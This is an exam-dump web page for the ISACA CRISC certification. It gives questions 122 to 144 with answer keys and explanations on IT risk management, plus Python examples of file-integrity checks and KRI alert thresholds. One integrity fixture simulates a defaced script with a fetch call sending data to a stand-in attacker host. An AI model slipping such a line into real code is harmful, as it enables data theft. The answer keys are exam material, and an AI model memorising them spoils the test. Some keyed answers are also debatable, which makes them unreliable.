[Apr-2023] CRISC Dumps With 100% Verified Q&As - Pass Guarantee or Full Refund [Q122-Q144]


Pass ISACA CRISC Exam With Practice Test Questions Dumps Bundle


The CRISC exam consists of 150 multiple-choice questions, and candidates have four hours to complete it. To be eligible for certification, candidates must have a minimum of three years of experience in IT risk management and information systems control. The four domains listed in many older dumps (Risk Identification, Assessment and Evaluation; Risk Response; Risk Monitoring; Information Systems Control Design and Implementation) come from a previous CRISC job practice; since August 2021 the exam covers four domains: Governance; IT Risk Assessment; Risk Response and Reporting; and Information Technology and Security.


NEW QUESTION # 122
Periodically reviewing and updating a risk register with details on identified risk factors PRIMARILY helps to:

  • A. aggregate risk scenarios identified across different business units.
  • B. build a threat profile of the organization for management review.
  • C. minimize the number of risk scenarios for risk assessment.
  • D. provide a current reference to stakeholders for risk-based decisions.

Answer: D

Explanation:
A risk register that is periodically reviewed and updated gives stakeholders a current, reliable reference for risk-based decisions. Aggregating scenarios across business units and building a threat profile are by-products of maintaining the register, not its primary purpose, and the aim is never to minimize the number of scenarios assessed.


NEW QUESTION # 123
Which of the following is the MOST important consideration when developing an organization's risk taxonomy?

  • A. Business context
  • B. IT strategy
  • C. Leading industry frameworks
  • D. Regulatory requirements

Answer: A



NEW QUESTION # 124
You work at Bluewell Inc., which builds advertising websites. Someone has made unauthorized changes to your website. Which of the following terms refers to this type of loss?

  • A. Loss of confidentiality
  • B. Loss of availability
  • C. Loss of revenue
  • D. Loss of integrity

Answer: D

Explanation:
Loss of integrity refers to the following types of losses:
An e-mail message is modified in transit

A virus infects a file

Someone makes unauthorized changes to a Web site

Incorrect Answers:
A: Someone seeing a password or a company's secret formula is a loss of confidentiality.
B: An e-mail server being down so no one has e-mail access, or a file server being down so data files aren't available, is a loss of availability.
C: Loss of revenue is a consequence that may eventually follow from any of these events; it is not the type of loss described.
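The three integrity examples above (a modified message, an infected file, a defaced website) all come down to the same question: does the content still match what the owner approved? The following Python example, added here and not part of the original dump, shows the two standard checks: a hash manifest of published site files compared against the live copy, and a keyed MAC for a message in transit. All paths, content and the shared key are constructed for the example.

```python
import hashlib
import hmac

# Constructed sample content for a small advertising site, keyed by path.
# Paths and content are hypothetical; they are not from the original page.
BASELINE_SITE = {
    "/index.html": b"<html><body><h1>Bluewell Ads</h1></body></html>",
    "/js/app.js": b"console.log('ads');",
}

# The same site after an unauthorized change: one file altered, one added.
TAMPERED_SITE = dict(BASELINE_SITE)
TAMPERED_SITE["/js/app.js"] = b"console.log('ads'); fetch('https://evil.example/steal');"
TAMPERED_SITE["/uploads/extra.php"] = b"<?php /* constructed placeholder */ ?>"


def build_manifest(site):
    """Integrity baseline: SHA-256 digest of every file, keyed by path."""
    return {path: hashlib.sha256(content).hexdigest() for path, content in site.items()}


def detect_changes(manifest, current_site):
    """Compare the live site against the baseline manifest.

    Returns sorted lists of modified, added and deleted paths. Any
    non-empty list is a loss of integrity: content differs from what
    the owner approved."""
    current = build_manifest(current_site)
    return {
        "modified": sorted(p for p in manifest if p in current and current[p] != manifest[p]),
        "added": sorted(p for p in current if p not in manifest),
        "deleted": sorted(p for p in manifest if p not in current),
    }


def example_scan():
    """Run the baseline check against the constructed tampered copy."""
    return detect_changes(build_manifest(BASELINE_SITE), TAMPERED_SITE)


# For a message in transit a plain hash is not enough: whoever alters the
# message can recompute it. A keyed MAC requires the shared secret.
SHARED_KEY = b"constructed-shared-secret"  # hypothetical key for the example


def tag_message(key, message):
    return hmac.new(key, message, hashlib.sha256).hexdigest()


def verify_message(key, message, tag):
    # compare_digest avoids leaking the tag through timing differences
    return hmac.compare_digest(tag_message(key, message), tag)


if __name__ == "__main__":
    print(example_scan())
    tag = tag_message(SHARED_KEY, b"approve invoice 100")
    print(verify_message(SHARED_KEY, b"approve invoice 100", tag))
    print(verify_message(SHARED_KEY, b"approve invoice 900", tag))
```

The manifest only proves anything if it is stored where the web server account cannot write to it; an attacker who can change the site and the manifest together leaves nothing to detect. That is the same reason the in-transit check uses a keyed MAC rather than a bare hash.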


NEW QUESTION # 125
FISMA requires federal agencies to protect IT systems and data. How often should compliance be audited by an external organization?

  • A. Quarterly
  • B. Annually
  • C. Every three years
  • D. Never

Answer: B

Explanation:
FISMA requires an annual independent evaluation of each agency's information security program. Each year, agencies must have an independent evaluation of their program; the objective is to determine the effectiveness of the program. These evaluations include:
* Testing for effectiveness: Policies, procedures, and practices are tested. The evaluation does not test every policy, procedure, and practice; instead, a representative sample is tested.
* An assessment or report: This report identifies the agency's compliance with FISMA and also lists compliance with other applicable standards and guidelines.
Incorrect Answers:
A, C, D: Compliance is evaluated by an independent organization annually, not quarterly, every three years, or never.


NEW QUESTION # 126
Which of the following come under the management class of controls?
Each correct answer represents a complete solution. (Choose two.)

  • A. Audit and accountability control
  • B. Program management control
  • C. Identification and authentication control
  • D. Risk assessment control

Answer: B,D

Explanation:
The Management class of controls (as defined in NIST SP 800-53 Rev. 3) includes five families, which together contain over 40 individual controls. The families in the Management class are:
Certification, Accreditation, and Security Assessment (CA): This family addresses the steps to implement a security assessment program. It includes controls to ensure only authorized systems are allowed on a network, and covers important concepts such as continuous monitoring and a plan of action and milestones.
Planning (PL): The PL family focuses on security plans for systems. It also covers Rules of Behaviour for users, also called an acceptable use policy.
Risk Assessment (RA): This family provides details on risk assessments and vulnerability scanning.
System and Services Acquisition (SA): The SA family includes controls related to the purchase of products and services, as well as controls related to software usage and user-installed software.
Program Management (PM): This family is driven by the Federal Information Security Management Act (FISMA). It provides controls to ensure compliance with FISMA. These controls complement other controls; they don't replace them.
Incorrect Answers:
A, C: Audit and accountability, and identification and authentication, are Technical class controls.


NEW QUESTION # 127
You work as the project manager for Bluewell Inc. Your project has several risks that will affect several stakeholder requirements. Which project management plan will define who will be available to share information on the project risks?

  • A. Communications Management Plan
  • B. Stakeholder management strategy
  • C. Resource Management Plan
  • D. Risk Management Plan

Answer: A

Explanation:
The Communications Management Plan defines, with regard to risk management, who will be available to share information on risks and responses throughout the project.
The Communications Management Plan defines the communication requirements of the project and how information will be distributed. It sets the communication structure for the project; this structure guides communication throughout the project's life and is updated as communication needs change. The Communications Management Plan identifies and defines the roles of the people involved in the project, and includes a communication matrix that maps the project's communication requirements.
Incorrect Answers:
B: The stakeholder management strategy does not address risk communications.
C: The Resource Management Plan does not define risk communications.
D: The Risk Management Plan defines risk identification, analysis, response, and monitoring, not who communicates about risks.


NEW QUESTION # 128
What is the FIRST phase of the IS monitoring and maintenance process?

  • A. Prioritizing risks
  • B. Implement monitoring
  • C. Report results
  • D. Identifying controls

Answer: A

Explanation:
The phases of the information system monitoring and maintenance process are:
Prioritize risks: The first phase is the prioritization of risk, which involves the following tasks:
Analyze and prioritize risks to organizational objectives.
Identify the necessary application components and the flow of information through the system.
Examine and understand the functionality of the application by reviewing the application system documentation and interviewing appropriate personnel.
Identify controls: After risks are prioritized, controls are identified; this involves the following tasks:
Key controls that address the prioritized risks are identified across the internal control system.
Application control strength is identified.
The impact of control weaknesses is evaluated.
A testing strategy is developed by analyzing the accumulated information.
Identify information: The IS control information is identified:
Identify information that will persuasively indicate the operating effectiveness of the internal control system.
Observe and test users performing procedures.
Implement monitoring: Develop and implement cost-effective procedures to evaluate the persuasive information.
Report results: After the monitoring process is implemented, the results are reported to relevant stakeholders.
Incorrect Answers:
B, C, D: These phases occur in the IS monitoring and maintenance process after prioritizing risks.


NEW QUESTION # 129
Prudent business practice requires that risk appetite not exceed:

  • A. residual risk.
  • B. inherent risk.
  • C. risk capacity.
  • D. risk tolerance.

Answer: C


NEW QUESTION # 130
Which of the following is the BEST way to determine the ongoing efficiency of control processes?

  • A. Interview process owners
  • B. Analyze key performance indicators (KPIs)
  • C. Perform annual risk assessments
  • D. Review the risk register

Answer: B



NEW QUESTION # 131
You and your project team are identifying the risks that may exist within your project. Some of the risks are small risks that won't affect your project much if they happen. What should you do with these identified risk events?

  • A. These risks can be accepted.
  • B. These risks can be dismissed.
  • C. All risks must have a valid, documented risk response.
  • D. These risks can be added to a low priority risk watch list.

Answer: D

Explanation:
Low-impact, low-probability risks can be added to the low priority risk watch list.
Incorrect Answers:
A: While these risks may be accepted, they should still be documented on the low priority risk watch list. This list is periodically reviewed, and the status of the risks may change.
B: These risks are not dismissed; they are still documented on the low priority risk watch list.
C: Not every risk demands a risk response.


NEW QUESTION # 132
Which of the following would be MOST helpful to a risk practitioner when ensuring that mitigated risk remains within acceptable limits?

  • A. Ensuring risk owners participate in a periodic control testing process
  • B. Building an organizational risk profile after updating the risk register
  • C. Implementing a process for ongoing monitoring of control effectiveness
  • D. Designing a process for risk owners to periodically review identified risk

Answer: C


NEW QUESTION # 133
Which of the following is the MOST important factor affecting risk management in an organization?

  • A. The risk manager's expertise
  • B. Board of director's expertise
  • C. The organization's culture
  • D. Regulatory requirements

Answer: C


NEW QUESTION # 134
You are the project manager of a project in Bluewell Inc. You and your project team have identified several project risks, completed risk analysis, and are planning to apply most appropriate risk responses. Which of the following tools would you use to choose the appropriate risk response?

  • A. Cause-and-effect analysis
  • B. Decision tree analysis
  • C. Project network diagrams
  • D. Delphi Technique

Answer: B

Explanation:
Decision tree analysis is a risk analysis tool that can help the project manager determine the best risk response. The tool can be used to measure probability, impact, and risk exposure, and how the selected risk response can affect the probability and/or impact of the selected risk event. It helps to form a balanced picture of the risks and opportunities connected with each possible course of action. This makes decision trees most useful for choosing between different strategies, projects, or investment opportunities, particularly when resources are limited. A decision tree is a decision support tool that uses a tree-like graph or model of decisions and their possible consequences, including chance event outcomes, resource costs, and utility.
Incorrect Answers:
A: Cause-and-effect analysis is used for exposing risk factors and is not effective for risk response planning. This analysis uses predictive or diagnostic analytical tools to explore the root causes or factors that contribute to positive or negative effects or outcomes.
C: Project network diagrams help the project manager and stakeholders visualize the flow of the project work, but they are not used as part of risk response planning.
D: The Delphi technique is used for risk analysis, i.e., for identifying the most probable risks. A group of experts independently rates the business risk of an organization; each expert analyzes and prioritizes the risks independently, and the results are combined into a consensus.


NEW QUESTION # 135
Natural disaster is BEST associated to which of the following types of risk?

  • A. Short-term
  • B. Discontinuous
  • C. Large impact
  • D. Long-term

Answer: B

Explanation:
Section: Volume D
Explanation:
Natural disaster can be a long-term or short-term and can have large or small impact on the company.
However, as the natural disasters are unpredictable and infrequent, they are best considered as discontinuous.
Incorrect Answers:
A: A natural disaster can be short-term, but this is not the best answer.
C: A natural disaster can have a large impact depending on its nature, but this is not the best answer.
D: A natural disaster can be long-term, but this is not the best answer.


NEW QUESTION # 136
Which of the following is the priority of data owners when establishing risk mitigation method?

  • A. Antivirus controls
  • B. Platform security
  • C. User entitlement changes
  • D. Intrusion detection

Answer: C

Explanation:
Data owners are responsible for assigning user entitlement changes and approving access to the systems for which they are responsible.
Incorrect Answers:
A, B, D: Data owners are not responsible for antivirus controls, platform security, or intrusion detection.
These are the responsibilities of data custodians.


NEW QUESTION # 137
You are the project manager of the GHT project. You have implemented an automated tool to analyze and report on access control logs based on severity. This tool generates an excessively large number of results. You perform a risk assessment and decide to configure the monitoring tool to report only alerts marked "critical". What should you do in order to accomplish that?

  • A. Apply risk response
  • B. Perform quantitative risk analysis
  • C. Optimize Key Risk Indicator
  • D. Update risk register

Answer: C

Explanation:
Because the sensitivity of the monitoring tool has to be changed, this requires optimization of a Key Risk Indicator (KRI). The monitoring tool that raises the alerts is itself acting as a risk indicator, so changing its sensitivity to alert only on critical situations is KRI optimization.
Incorrect Answers:
A, B, D: These options are not relevant to changing the sensitivity of the monitoring tool.
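What "optimizing the KRI" looks like in practice is a threshold change, not a new tool. The following Python example, added here and not part of the original dump, computes one KRI (failed logins per user) from constructed access-control log lines, maps it to a severity with tunable thresholds, and shows the reporting configuration the question describes: the same data, filtered to critical only. The log format, user names and threshold values are all assumptions for the example.

```python
import re
from collections import Counter

# Constructed access-control log lines (hypothetical format and users, not
# from the original page): alice fails twice, dave three times, bob six times.
SAMPLE_LOG = """\
2023-04-01T09:00:01 user=alice action=login result=FAIL src=10.0.0.5
2023-04-01T09:00:03 user=alice action=login result=FAIL src=10.0.0.5
2023-04-01T09:00:04 user=alice action=login result=OK src=10.0.0.5
2023-04-01T09:01:10 user=bob action=login result=FAIL src=10.0.0.9
2023-04-01T09:01:12 user=bob action=login result=FAIL src=10.0.0.9
2023-04-01T09:01:14 user=bob action=login result=FAIL src=10.0.0.9
2023-04-01T09:01:16 user=bob action=login result=FAIL src=10.0.0.9
2023-04-01T09:01:18 user=bob action=login result=FAIL src=10.0.0.9
2023-04-01T09:01:20 user=bob action=login result=FAIL src=10.0.0.9
2023-04-01T09:02:00 user=carol action=privilege_change result=OK src=10.0.0.7
2023-04-01T09:03:01 user=dave action=login result=FAIL src=10.0.0.11
2023-04-01T09:03:05 user=dave action=login result=FAIL src=10.0.0.11
2023-04-01T09:03:09 user=dave action=login result=FAIL src=10.0.0.11
"""

LINE_RE = re.compile(r"user=(?P<user>\S+) action=(?P<action>\S+) result=(?P<result>\S+)")

# Severity thresholds are the tunable part of the KRI. Adjusting them, and
# the minimum severity that gets reported, is the "optimization" the
# question describes: fewer, more meaningful alerts from the same data.
DEFAULT_THRESHOLDS = {"warning": 3, "critical": 5}
SEVERITY_ORDER = {"info": 0, "warning": 1, "critical": 2}


def failed_logins_per_user(log_text):
    """KRI value: number of failed logins per user in the log window."""
    counts = Counter()
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if m and m["action"] == "login" and m["result"] == "FAIL":
            counts[m["user"]] += 1
    return counts


def classify(count, thresholds=DEFAULT_THRESHOLDS):
    """Map a KRI value to a severity band using the configured thresholds."""
    if count >= thresholds["critical"]:
        return "critical"
    if count >= thresholds["warning"]:
        return "warning"
    return "info"


def alerts(log_text, min_severity="info", thresholds=DEFAULT_THRESHOLDS):
    """Return (user, failed_count, severity) for every user at or above
    min_severity. min_severity="critical" is the reporting configuration
    chosen in the question."""
    out = []
    for user, n in sorted(failed_logins_per_user(log_text).items()):
        sev = classify(n, thresholds)
        if SEVERITY_ORDER[sev] >= SEVERITY_ORDER[min_severity]:
            out.append((user, n, sev))
    return out


if __name__ == "__main__":
    print(alerts(SAMPLE_LOG))              # every user, the noisy default
    print(alerts(SAMPLE_LOG, "critical"))  # only the account under attack
```

The trade-off a risk practitioner should record alongside the change: raising the reporting floor to critical drops dave's three failures from the report entirely, so the thresholds need to be revisited when the risk assessment is repeated, not set once and forgotten.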


NEW QUESTION # 138
Which of the following is the BEST way to promote adherence to the risk tolerance level set by management?

  • A. Increasing organizational resources to mitigate risks
  • B. Avoiding risks that could materialize into substantial losses
  • C. Defining expectations in the enterprise risk policy
  • D. Communicating external audit results

Answer: C



NEW QUESTION # 139
Which of the following is the MAIN benefit of involving stakeholders in the selection of key risk indicators (KRIs)?

  • A. Obtaining buy-in from risk owners
  • B. Improving risk awareness
  • C. Optimizing risk treatment decisions
  • D. Leveraging existing metrics

Answer: A


NEW QUESTION # 140
What are the responsibilities of the CRO?
Each correct answer represents a complete solution. Choose three.

  • A. Managing the supporting risk management function
  • B. Advising Board of Directors
  • C. Managing the risk assessment process
  • D. Implement corrective actions

Answer: A,C,D

Explanation:
The Chief Risk Officer is an executive-level manager in an organization. The CRO provides corporate guidance, governance, and oversight of the enterprise's risk management activities. A main priority for the CRO is to ensure that the organization is in full compliance with applicable regulations. The CRO may also deal with areas such as insurance, internal auditing, corporate investigations, fraud, and information security.
The CRO's responsibilities include:
Managing the risk assessment process
Implementing corrective actions
Communicating risk management issues
Managing the supporting risk management function


NEW QUESTION # 141
Which of the following findings of a security awareness program assessment would cause the GREATEST concern to a risk practitioner?

  • A. The program has not decreased threat counts.
  • B. The program uses non-customized training modules.
  • C. The program has not considered business impact.
  • D. The program has been significantly revised

Answer: B


NEW QUESTION # 142
An organization has raised the risk appetite for technology risk. The MOST likely result would be:

  • A. decreased residual risk
  • B. lower risk management cost
  • C. increased inherent risk
  • D. higher risk management cost

Answer: B

Explanation:
A higher risk appetite means the organization is willing to accept more risk, so less risk treatment is needed and the cost of risk management falls. Residual risk would decrease only if more controls were applied, and inherent risk is independent of appetite.


NEW QUESTION # 143
Who should be PRIMARILY responsible for performing user entitlement reviews?

  • A. IT security manager
  • B. Data custodian
  • C. IT personnel
  • D. Data owner

Answer: D


NEW QUESTION # 144
......

2023 Valid CRISC test answers & ISACA Exam PDF: https://www.testinsides.top/CRISC-dumps-review.html

Free ISACA CRISC Exam Questions and Answer from Training Expert TestInsides: https://drive.google.com/open?id=17_rwMMUPNtL-xTQIwzph-BcKYP_yQIfH